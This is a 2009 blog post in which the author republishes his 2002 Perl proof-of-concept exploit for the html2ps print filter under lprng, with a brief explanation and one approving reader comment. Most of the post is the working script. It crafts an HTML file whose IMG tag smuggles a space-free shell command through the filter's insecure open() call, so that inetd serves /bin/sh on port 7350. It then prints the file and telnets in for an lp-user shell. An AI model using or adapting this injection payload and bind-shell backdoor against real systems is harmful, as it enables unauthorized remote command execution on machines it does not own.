Tuesday, March 10, 2009

Some news



This post satisfies two needs (except publishing code at all):


First, I hate how this blog automatically wraps my lines and
how it de-formats all things I am doing. I try to submit
pure HTML code now and hope it works. Second, I decided to
publish some old exploits of me for historical, technical
and educational purposes. A recent law-case in Germany showed
that jail-or-not is all about your intention. It is legal
to publish dual-use code or code that could be used to do
something evil if your intention is to make the world a more
secure place or to teach others how to protect themself etc..
It is illegal to publish such code in order to commit a crime
which is clearly and obviosuly not what I am doing.

The code is that old (2002), that there should rarely be any box at all
which still ships the vulnerable print-filter that is exploited
here. So, except for teaching something this code is useless.
The interesting thing about this piece is that the printfilter didnt
accept spaces in the IMG-tag. But read yourself:

#!/usr/bin/perl -W

# html2ps remote "lp" exploit. Opens shell on port 7350.
# If used for testing remote machines, /etc/printcap must
# contain appropriate remote printernames etc. and lpd must
# be set up correctly.
# (C) 2002 Sebastian Krahmer, proof of concept exploit.

# Brief problem description: lprng calls printfilters as any
# other print-spooling systems do. It calls them with UID of lp
# thats why you get lp-user shell later. The html2ps filter which is
# a perl script is called to convert the evil.html to .ps.
# However there it breaks because html2ps calls open() function insecurely
# and some other bad stuff is done too. It tries to convert the IMG embedded
# in the html and invokes some commands which give us access. Thats all. :)


sub usage
{
print "\n$0 <printhost> <remote-host>\n".
"\tprinthost -- name of printer in /etc/printcap\n".
"\tremote-host -- IP or hostname of host where shell appears\n".
"'$0 lp 127.0.0.1' is recommended for everyones own machine\n\n";
exit;
}


my $printhost = shift || usage();
my $remote = shift || usage();

print "Constructing evil.html ...\n";

open O, ">evil.html" or die $!;
print O<<__eof__;
<HTML>
<IMG SRC="|IFS=A;X=A;echo\${X}7350\${X}stream\${X}tcp\${X}nowait\${X}lp\${X}/bin/sh\${X}-i|dd\${X}of=/tmp/f;inetd\${X}/tmp/f">
</HTML>
__eof__

close O;

if (fork() == 0) {
exec("/usr/bin/lpr", "-P", $printhost, "evil.html");
}
wait;
sleep 3;
print "Connecting ...\n";
exec("/usr/bin/telnet", $remote, 7350);

1 comment:

Anonymous said...

Keep posting stuff like this i really like it